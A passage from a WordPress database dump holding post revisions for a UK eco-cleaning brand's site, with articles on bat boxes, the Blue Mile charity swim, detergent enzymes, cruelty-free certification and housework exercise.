</form>\n</body>\n</html>','Wear and Care for your wardrobe','','publish','open','open','','wear-and-care-for-your-wardrobe','','','2017-10-17 08:30:43','2017-10-17 08:30:43','',0,'http://www.dailyjolly.co.uk/wear-and-care-for-your-wardrobe',0,'post','',0),(61,1,'2017-10-17 08:34:47','2017-10-17 08:34:47','<h2 class=\"title\">A savvy idea for bats <i>or</i> birds</h2>\r\nWhen a group of students and DofE participants at Savio Salesian College in Bootle, Merseyside spent a lesson studying bats, they decided they\'d like to use their woodworking time making bat boxes. The year above, however, wanted to give bird boxes a go. Luckily, their inventive teacher asked them to come up with a design that could work as both, and the Savy BOB box was born.\r\n\r\nThe BOB box works by having two separate entrances; one on the front for birds, and one underneath for bats. The bat entrance can be closed off to allow for birds nesting at the front.\r\n\r\nStudents make their BOB boxes by hand during lunch breaks and after school and in just 2 years they\'ve made over 1,000. So far the project has proven a great success. When Knowsley Safari Park heard about these innovative multi-purpose roosts, they placed an order for BOB boxes in their woodland walk. Pupils can even count members of the royal family as fans.\r\n\r\nThe effort they\'ve put it has surprised many, including their teacher, Steve Burrowes. \"This has been like a springboard for them\" he says. \"I don\'t think I realised the impact it would have; my classroom is a better classroom for it, and our school is a better school for it\".\r\n\r\nIn the school\'s garden, pupils are already enjoying the sight of common finches and blue tits as they make use of their handmade, homemade habitats. As well as winning a prestigious <a href=\"../../friends/observer-ethical-awards/\">Observer Ethical Award</a>, the BOB box has been given recognition and approval by the Bat Conservation Trust (BCT) who is now helping to fund production.\r\n\r\nIt\'s not only birds and bats that benefit; the project has given pupils a real sense of focus and pride. \"It\'s been running for two years now and we\'ve really enjoyed learning about the bats and the birds and making these BOB boxes\" says pupil Dominic Cavanagh.\r\n\r\nThe next step for Savio Salesian pupils is to begin selling BOB boxes online. But until then, you can get your hands on one of 13 by entering our competition to <a href=\"../../offers-and-competitions/bob-box-competition/\">win a BOB box</a>.','Bat or Bird box','','inherit','closed','closed','','27-revision-v1','','','2017-10-17 08:34:47','2017-10-17 08:34:47','',27,'http://www.dailyjolly.co.uk/27-revision-v1',0,'revision','',0),(62,1,'2017-10-17 08:35:14','2017-10-17 08:35:14','<h2 class=\"title\">Move an Daily Blue Mile</h2>\r\nIt\'s a sad truth that the world\'s rivers, oceans, lakes and wetlands are under threat. Factors such as climate change and pollution are affecting water quality, along with the delicate ecological systems that many plants, fish and aquatic species rely on to survive.\r\n\r\nTo raise awareness of the importance of our rivers and seas we\'re sponsoring <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"nofollow noopener\">Blue Mile</a> with the monies raised going to the Marine Conservation Society. The Daily Blue Mile needs people like you to move just 1 mile either on or around water. Whether you prefer a leisurely lake swim or an enlivening coastal walk, you could really help the world to appreciate the true value of our water sources. And with so many beautiful lakes, rivers and coastlines to choose from here in the UK, it\'s the perfect excuse to get out and make the most of them!\r\n\r\nRegistration is now live for the flagship event in Plymouth with further events around the country (including one in Weymouth in July) - <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"nofollow noopener\">find out more</a>\r\n\r\nCheck out this video of the 2012 event!','What you need to know about the Blue Mile','We are sponsoring this year\'s Blue Mile events. Swim, walk or paddle for a mile and raise money for WWF, helping their efforts to protect rivers and wetlands.','inherit','closed','closed','','31-revision-v1','','','2017-10-17 08:35:14','2017-10-17 08:35:14','',31,'http://www.dailyjolly.co.uk/31-revision-v1',0,'revision','',0),(63,1,'2017-10-17 08:36:03','2017-10-17 08:36:03','<h2 class=\"title\">New recruit in serious training for the Blue Mile</h2>\r\nDaily UK\'s new Brand Assistant Lee Benham is more than a team player – he\'s our team swimmer! He\'s been taking his training for the <a href=\"../../articles/blue-mile/\">Daily Blue Mile</a> challenge very seriously, getting up bright and early to train at the Tri20 Swimming Centre open lake in Reading. While stopping for a glug of water earlier this morning he was heard to gasp, \"Michael Phelps doesn\'t have a patch on me!\"\r\n\r\nLee will be taking the plunge in the swimming leg of the Corporate Race, which takes place at Plymouth waterfront on 8th and 9th September, and is looking to beat Trade Marketing Manager Simon Reberga\'s effort last year of around 34 minutes. Simon will be taking on the challenge of the kayak section this time instead.\r\n<div class=\"highlight2\">\r\n\r\n\"Michael Phelps doesn\'t have a patch on me!\"\r\n\r\n</div>\r\nThe Blue Mile is one of a whole host of water themed activities featured as part of the Plymouth Marine City Festival. The Daily stall will be handing out free goody bags and there\'ll be plenty of other exciting exhibitors to browse around too. There will be live music to entertain the crowds and hopefully spur on our team to some record-breaking times. Delicious sustainable cuisine will be available at the Boat House Café for hungry swimmers, paddlers, kayakers, walkers and spectators. And if that wasn\'t enough to tempt you to join the fun, there will be a giant sea creature parade happening on the Saturday. Not to be missed!\r\n\r\nWe wish everyone taking part a fun-packed day. Keep up the training everyone, including Lee. Remember, Positive Mental Attitude can take you a long way…\r\n\r\nYou too can take part in The Daily Blue Mile, whether you prefer to swim, kayak, walk or even stand-up paddle board. To find out more visit <a href=\"http://www.thebluemile.org/\" target=\"_blank\" rel=\"noopener\">www.thebluemile.org</a>\r\n\r\nAlready in training? Let us know how you\'re getting on using <strong>#DailyBlueMile</strong>\r\n\r\nSee you there!','Are you training for the Blue Mile? Check out our tips','Our new Brand Assistant is training for this year\'s Blue Mile event. You can join in - sign-up to swim, walk or paddle for a mile and raise money for WWF.','inherit','closed','closed','','30-revision-v1','','','2017-10-17 08:36:03','2017-10-17 08:36:03','',30,'http://www.dailyjolly.co.uk/30-revision-v1',0,'revision','',0),(64,1,'2017-10-17 08:36:30','2017-10-17 08:36:30','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n	<meta name=\"description\" content=\"Hands up if you think that enzymes are a nasty? If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around.\"/>\n    <meta property=\"og:url\" content=\"http://www.the-splash.co.uk/articles/biological-cleaning-and-the-enzyme-myth\"/>\n    <meta property=\"og:title\" content=\"Biological cleaning and the enzyme myth\"/>\n    <meta property=\"og:description\" content=\"Hands up if you think that enzymes are a nasty? If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around.\"/>\n    <meta property=\"og:image\" content=\"http://www.the-splash.co.uk/images/articles/enzymes2.jpg\"/>\n	<link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/biological-cleaning-and-the-enzyme-myth\">\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/article-comments.css\" media=\"screen\"/>\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jqueryui/1.10.3/jquery-ui.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n  var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://\' : \'http://\') + \'stats.g.doubleclick.net/dc.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section facts-about-ecover-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/biological-cleaning-and-the-enzyme-myth/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          \n          <div class=\"w1\">\n				<div class=\"w2\">\n					<div class=\"w3\">\n					    \n						\n					  <div id=\"main\">\n							\n										</ul>\n																				\n										<div id=\"twocolumns\">\n											<div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h1>Biological Detergents: Busting the Enzyme Myth</h1>\n														<br/>\n                                                        \n														<p>\n                                                            <strong>Hands up if you think that enzymes are a <a href=\"../../articles/no-nasties/\">nasty</a>?</strong>\n                                                        </p>\n														<p>\n                                                            If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around and show you why we think enzymes are another example of what makes nature brilliant.\n                                                        </p>\n														<p>\n                                                            Enzymes are everywhere from your belly to our biological detergents, because when it comes to breaking down proteins they reign supreme. Acting as a catalyst in laundry detergents, our enzymes roll up their biological sleeves and wrestle tough protein based stains from your clothes.\n                                                        </p>\n                                                        \n														<p>\n                                                            As the powerhouses of the biological cleaning, you\'ll find enzyme formulations across our range including <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/products/ecover-bio-laundry-gel-18-washes/egelbiogreen18.aspx?productid=egelbiogreen18\" target=\"_blank\">Daily Bio Gel</a>, <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\">Powder</a>, and <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/search.aspx?q=bio%20liquid\" target=\"_blank\">Liquid</a> but without those chemical nasties.\n                                                        </p>\n														<p>\n                                                            So next time you put the washing on, sit down and relax with a cuppa, safe in the knowledge that the grass stained school uniforms will come out shining bright and stain free after using the Daily Biological range. \n                                                        </p>\n														<p>\n                                                            <strong>Put it to the test for yourself, we\'ve five <a href=\"../../offers-and-competitions/bio-bundle/\">Daily Bio Bundles</a> to giveaway...</strong>\n                                                        </p>\n                                                        <div class=\"your-comments\"></div>   \n							                            <div class=\"social1\">\n							                                \n<div class=\"share-this-container\">\n    <div class=\"share-this\">\n        <div class=\"tweet-form\"></div>\n    </div>\n</div>\n							                            </div>\n													</div>\n												</div>\n											</div>\n									  </div>\n								  </div>\n								</div>\n						  </div>\n						</div>\n					</div>\n			  </div>\n			</div>\n		</div>\n  </div>\n    s\n    </form>\n</body>\n</html>','Biological cleaning and the enzyme myth','Hands up if you think that enzymes are a nasty? If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around.','inherit','closed','closed','','29-autosave-v1','','','2017-10-17 08:36:30','2017-10-17 08:36:30','',29,'http://www.dailyjolly.co.uk/29-autosave-v1',0,'revision','',0),(65,1,'2017-10-17 08:36:55','2017-10-17 08:36:55','<h1>Biological Detergents: Busting the Enzyme Myth</h1>\r\n<strong>Hands up if you think that enzymes are a <a href=\"../../articles/no-nasties/\">nasty</a>?</strong>\r\n\r\nIf you\'re hand is up - nil point. We are here to bust a few myths that have been floating around and show you why we think enzymes are another example of what makes nature brilliant.\r\n\r\nEnzymes are everywhere from your belly to our biological detergents, because when it comes to breaking down proteins they reign supreme. Acting as a catalyst in laundry detergents, our enzymes roll up their biological sleeves and wrestle tough protein based stains from your clothes.\r\n\r\nAs the powerhouses of the biological cleaning, you\'ll find enzyme formulations across our range including <a href=\"http://www.ecoverdirect.com/products/ecover-bio-laundry-gel-18-washes/egelbiogreen18.aspx?productid=egelbiogreen18\" target=\"_blank\" rel=\"noopener\">Daily Bio Gel</a>, <a href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\" rel=\"noopener\">Powder</a>, and <a href=\"http://www.ecoverdirect.com/search.aspx?q=bio%20liquid\" target=\"_blank\" rel=\"noopener\">Liquid</a> but without those chemical nasties.\r\n\r\nSo next time you put the washing on, sit down and relax with a cuppa, safe in the knowledge that the grass stained school uniforms will come out shining bright and stain free after using the Daily Biological range.\r\n\r\n<strong>Put it to the test for yourself, we\'ve five <a href=\"../../offers-and-competitions/bio-bundle/\">Daily Bio Bundles</a> to giveaway...</strong>','Biological cleaning and the enzyme myth: what is the truth?','Hands up if you think that enzymes are a nasty? If you\'re hand is up - nil point. We are here to bust a few myths that have been floating around.','inherit','closed','closed','','29-revision-v1','','','2017-10-17 08:36:55','2017-10-17 08:36:55','',29,'http://www.dailyjolly.co.uk/29-revision-v1',0,'revision','',0),(66,1,'2017-10-17 08:37:34','2017-10-17 08:37:34','<h1>Bee Clever has landed at the Eden Project</h1>\r\n<strong>Bee Clever has been enjoying a fantastic summer, from buzzing out to the rocking tunes at Glasto to the Inspire Zone at <a href=\"../../feel-good/ecover-garden/\">RHS Hampton Court Flower show</a>.</strong>\r\n\r\nNow <strong>Bee Clever</strong> can be enjoyed all year round at Eden, a fitting home full of similar marvellous recycled creations, creatures and beautiful gardens to pollinate.\r\n\r\nIf you\'re visiting, head over to <strong>\'The Hive in the Orchard\'</strong> at the centre of the site, where you can say hello to the giant bee before picking up information needed to start you on your journey through <strong>Eden</strong>.\r\n\r\n<strong>Daily</strong> and <strong>Eden</strong> will be working together to show that with some <strong><a href=\"../../message-in-our-bottle/green-cleaning-innovation-infographic/\">clever science</a></strong> you can really learn from nature, from biome and honeycomb structures to nature\'s chemistry. The sculpture will form part of a new pollination project seeking to raise awareness in <strong><a href=\"../../feel-good/help-support-our-bees/\">helping support our bees</a></strong>.\r\n\r\n&nbsp;\r\n\r\n<strong>Daily</strong> is keen to show our support for our friends at Eden Project, an environmental charity, transforming social and environmental projects around the world. In addition to being a leading UK attraction it also develops students, doing valuable research into plant conservation.\r\n\r\nRead <strong><a href=\"http://www.edenproject.com/blog/index.php/2013/07/meet-the-recycled-bee-sculture-who-has-just-landed-at-eden/\" target=\"_blank\" rel=\"noopener\">Eden\'s Blog</a></strong> and visit <strong><a href=\"http://www.edenproject.com/\" target=\"_blank\" rel=\"noopener\">www.edenproject.com</a></strong> to find out about how you can make the most of your trip.','What\'s new at the Eden Project?','Bee Clever has been enjoying a fantastic summer, from buzzing out to the rocking tunes at Glasto to the Inspire Zone at RHS Hampton Court Flower show.','inherit','closed','closed','','28-revision-v1','','','2017-10-17 08:37:34','2017-10-17 08:37:34','',28,'http://www.dailyjolly.co.uk/28-revision-v1',0,'revision','',0),(67,1,'2017-10-17 08:38:00','2017-10-17 08:38:00','<h2 class=\"title\">Catalytic Clothing: Style with Substance</h2>\r\nIt\'s well known that, at Daily, we care about the environment, and that our cleaning products are designed to have minimum impact on the earth\'s water supplies. But not everyone knows just how much work we put into supporting the pioneering world of environmental science, and the technology and ideas that can make a difference.\r\n\r\nYou see, it\'s not just \'improving water quality\' that\'s at the top of the Daily to-do list. What happens above sea level is just as important to us as what happens below it, so we\'re delighted to be involved in a fantastic new project that focuses on clean air.\r\n<div class=\"highlight\">\r\n\r\nWinners of the 2012 Conde Nast Innovation &amp; Design Awards for \"Sustainability\"\r\nThank you for voting!\r\n\r\n</div>\r\nOf all environmental factors, air pollution has the biggest impact on our health, and it\'s responsible for the majority of environment-related diseases. Each year in the EU, 348,000 premature deaths are attributed to air pollution. With traffic cited as the major cause, the quality of our air is steadily getting worse. When you consider that, throughout an average person\'s life, they\'ll take over 672,768,000 breaths, it becomes clear just how important this issue is.\r\n\r\nWe\'ve been assisting some of the brightest minds to develop a solution; <a href=\"http://www.catalytic-clothing.org/home.html\" target=\"_blank\" rel=\"nofollow noopener\">Catalytic Clothing</a>. It\'s an idea so brilliant we think everyone should know.\r\n\r\nCatalytic Clothing, the brainchild of artist/designer Professor Helen Storey and scientist Professor Tony Ryan, is a pioneering new project that seeks to discover how we could harness the surface of our clothing to purify the air we breathe. By combining the worlds of fashion and chemistry, Helen and Tony have found a way to create style with real substance.\r\n\r\nHere\'s how it works...\r\n\r\nA \'photocatalyst\' is a rather clever chemical which, when exposed to sunlight, breaks down the pollutants in the air. By adding a photocatalyst to fabrics like denim, then turning these fabrics into wearable garments such as jeans, Catalytic Clothing gives you the capacity to neutralise pollution as you go about your daily life. It\'s like carrying your very own catalytic converter in your pocket – except that catalytic converter is your pocket.\r\n\r\nWhile photocatalysts are sometimes added to paint and plastics in buildings, their effect is only felt within 1m of the treated surface. However, when photocatalysts are added to clothing they become mobile, which means they can do their job across a much wider area. For example, if 40 people crossed a 1m stretch of pavement, in just 1 minute they\'d purify 2m2 of air.\r\n\r\nWherever you go, your clothing goes. And wherever your Catalytic Clothing goes, it cleans the air. Amazing!\r\n\r\nIt\'s still early days, and there\'s a lot of work to be done before Catalytic Clothing is ready for the market place. Right now, our aim is to raise awareness. Together with Helen and Tony, we\'re telling everyone who\'ll listen about this groundbreaking development in environmental science. Thanks to a <a href=\"http://www.catalytic-clothing.org/\" target=\"_blank\" rel=\"nofollow noopener\">short video preview</a>, some of the top fashion and science blogs have already started to spread the word about Catalytic Clothing.\r\n\r\nSo if you agree that air-purifying jeans are a work of genius, tell your friends. Put it on your blog, \'like\' the <a href=\"http://www.facebook.com/pages/Catalytic-Clothing-Clothes-that-purify-air/203320786366452\" target=\"_blank\" rel=\"nofollow noopener\">Catalytic Clothing Facebook page</a> and keep an eye on the fashion press... but just remember, you heard it here first.\r\n\r\n<strong>Professor Tony Ryan (OBE)</strong>\r\n<i>Pro-Vice Chancellor - Pure Sciences (University of Sheffield)</i>\r\n<strong>Professor Helen Storey (MBE)</strong>\r\n<i>Professor of Fashion and Science (London College of Fashion)</i>','Catalytic Clothing - Style with Substance','','inherit','closed','closed','','32-revision-v1','','','2017-10-17 08:38:00','2017-10-17 08:38:00','',32,'http://www.dailyjolly.co.uk/32-revision-v1',0,'revision','',0),(68,1,'2017-10-17 08:38:44','2017-10-17 08:38:44','<h1>What should you be thinking about when cleaning the toilet?</h1>\r\n<strong>Did you know <a href=\"http://www.ecoverdirect.com/products/toilet-cleaner---pine-fresh/etoiletpf750ml.aspx?productid=etoiletpf750ml\" target=\"_blank\" rel=\"noopener\">Daily Toilet Cleaner</a> is 10 times less toxic than many of the leading brands?</strong>\r\n\r\nBut what does that actually mean you ask?\r\n\r\nOur ingredients are carefully selected against very strict criteria and one area that we take seriously is the \'aquatic toxicity\' of our products, because we believe water is life.\r\n\r\nNow here\'s the geeky bit - aquatic toxicity is measured by Critical Dilution Volume or CDV as we call it. CDV measures how much water it takes to neutralise each dose of a product.\r\n\r\nThe lower the \'CDV\', means the lower the aquatic toxicity, which results in a healthier environment for all of the fishes. All of that, plus a fresh and clean toilet, now that really is Feel Good Cleaning\r\n\r\nWonder if any other leading brands measure their CDV?\r\n\r\nWe can always get better though and it has always been our mission to be at the <a href=\"../../message-in-our-bottle/\">cutting edge of sustainability</a>, which means even lower CDV.\r\n\r\nIf you think that was an eye opener, have you seen our <a href=\"../../articles/factory-facts/\">ecological factories</a>?','What should you be thinking about when cleaning the toilet?','Did you know Ecover Toilet Cleaner is 10 times less toxic than many of the leading brands? But what does that actually mean you ask?','inherit','closed','closed','','33-revision-v1','','','2017-10-17 08:38:44','2017-10-17 08:38:44','',33,'http://www.dailyjolly.co.uk/33-revision-v1',0,'revision','',0),(69,1,'2017-10-17 08:38:54','2017-10-17 08:38:54','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"Ecover have always been against animal testing for our ingredients, and now we are part of Cruelty Free International\'s official Leaping Bunny programme.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/cruelty-free-products\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section our-beautiful-world-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/bugs-life/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">A seal of approval for our love of furry things</h2>\n														<p>\n                                                            Animals - we love them whether they\'re big, small, fluffy, furry, wriggly, cute or even a bit funny looking. That\'s why ever since Daily began, we\'ve always been against animal testing for the ingredients in our products. \n                                                        </p>\n                                                        <p>\n                                                            Sadly, there aren\'t yet any bans on animal testing for cleaning products or their ingredients. A handful of countries have outlawed animal testing for cosmetics and personal products, but there\'s still a long way to go. \n                                                        </p>\n                                                        <p>\n                                                            Of course, we all need to know that our products are safe for our homes and families. Europe\'s REACH (Registration, Evaluation, Authorisation and Restriction of Chemicals) regulation helps with this by insisting that all chemicals are registered and assessed for safety, with animals used for testing only as a last resort. We believe that animals shouldn\'t be used at all: using non-animal tests and existing ingredients that have already been proved to be fine is the way to do it.\n                                                        </p>\n                                                        <div class=\"highlight\"><p>We\'ve worked hard to gain the Leaping Bunny stamp... for the benefit of furry, funny creatures everywhere.</p></div>\n                                                        <h3>\n                                                            Making it official\n                                                        </h3>\n                                                        <p>\n                                                            After lots of requests, we set out to make our cruelty free status official to reassure Daily lovers that no animals were harmed for the sake of the washing up and other chores. A huge part of the process was making sure we could work with the Cruelty Free International in their quest to get non-animal testing accepted and approved by the industry. Once that was all in place, we were then able to set our own cut-off date for ingredient testing. And here we are. In August this year, all our household and laundry products earned the Leaping Bunny stamp of approval. We\'re happy as rabbits.\n                                                        </p>\n                                                        <p>\n                                                            The Leaping Bunny is the trusted mark of the only international no-animal-testing certification. It\'s managed by a network of animal protection organisations worldwide, including Cruelty Free International, who are all dedicated to ending the use of animals in product testing completely. Hooray.\n                                                        </p>\n                                                        <p>\n                                                            To earn the Leaping Bunny mark, Daily needed to meet the strict criteria of the Humane Household Products Standard. This means that as well as not using animal testing for Daily, our ingredients must be animal test free too. We passed our audit with flying colours and are proud to be adding the lovely little stamp to all our household products. You\'ll see it sometime soon, if you haven\'t already. \n                                                        </p>\n                                                        <h3>\n                                                            A happier future for bunnies everywhere\n                                                        </h3>\n                                                        <p>\n                                                            When it comes to new ingredients, we\'re committed to using alternative tests that guarantee safety for you and your family without harming anything else. We\'ve worked hard to gain the Leaping Bunny stamp, and we\'ll continue to invest our time, energy and hard cash into the ongoing efforts for the benefit of furry, funny creatures everywhere. \n                                                        </p>\n                                                        <p>\n                                                            Both Daily and the suppliers of our ingredients will continue to have regular checks and audits to make sure we\'re all sticking to the required standards. We\'re also busy working towards certification for all our personal care and commercial products. It\'s a big job but one we\'re more than happy to do. \n                                                        </p>\n                                                        <h3>\n                                                            Have your say\n                                                        </h3>\n                                                        <p>\n                                                            We\'re really excited about joining the Leaping Bunny programme. We\'d love to know what you think about it too, so if you\'ve got something to say why not hop over to our <a href=\"../../my-ecover/discussion-replies/29/\">discussion board</a>...\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                          <div id=\"sidebar\">\n                            <div class=\"tabset-wrapper\">\n                              <div class=\"tabset-holder\">\n                                <div class=\"b\">\n														</div>\n													</div>\n												</div>\n											</div>\n										</div>\n									</div>\n								</div>\n								<div class=\"box-b\"></div>\n							</div>\n						</div>\n												<div id=\"inner-footer\">\n							<div class=\"footer-section\">\n								<div class=\"t\"></div>\n								\n								<div class=\"b\"></div>\n							</div>\n							<div class=\"bottom-panel contrast\"></div>\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Cruelty free cleaning products | The-Splash | ECOVER','Ecover have always been against animal testing for our ingredients, and now we are part of Cruelty Free International\'s official Leaping Bunny programme.','inherit','closed','closed','','35-autosave-v1','','','2017-10-17 08:38:54','2017-10-17 08:38:54','',35,'http://www.dailyjolly.co.uk/35-autosave-v1',0,'revision','',0),(70,1,'2017-10-17 08:39:33','2017-10-17 08:39:33','<h2 class=\"title\">Cleanercise: You can workout whilst doing the housework!</h2>\r\nIf you\'re struggling to find time to hit the gym and worried that those household chores are mounting up, we\'ve come up with an ingenious way to combine the two: Cleanercising.\r\n\r\nFrankie, Dancing On Ice\'s star skater, fitness fanatic and Daily lover has accepted our challenge to turn everyday cleaning tasks into thigh-trimming, tum-toning, energy-giving exercise routines.\r\n\r\nWatch Our Cleanercise routine to find out how you can feel good (and healthy) while you clean.\r\n<h3>Our Top Cleanercise Tips</h3>\r\n\"I am always looking for new ways to fit everything into a busy day. By Cleanercising, you stay healthy and your home stays sparkling. Here are just a few of the effective exercises that can be added to household chores.\r\n<h3>Maximum mopping</h3>\r\nDid you know you can burn 300 calories an hour when mopping the floor? Add in some full body twists by mopping side to side, plus forward leg lunges when mopping forwards and backwards, and you\'ll be working your tummy, legs and arms even more. You\'ll feel the benefits in no time!\r\n\r\n&nbsp;\r\n<h3>Worktop and window work-out</h3>\r\nClean worktops and windows with a mix of small, fast circular movements and long over-arm sweeps. A full body workout can be achieved, honing the core muscles, tightening the triceps, shoulders and back. Switch hands every 5 to 10 times to work both sides evenly.\r\n\r\n&nbsp;\r\n<h3>Bicep bottle</h3>\r\nThe gym isn\'t the only place to tone up; your home contains some great workout props. Fill two empty Daily bottles with water and use them as weights to tone your arms - starting with eight bicep 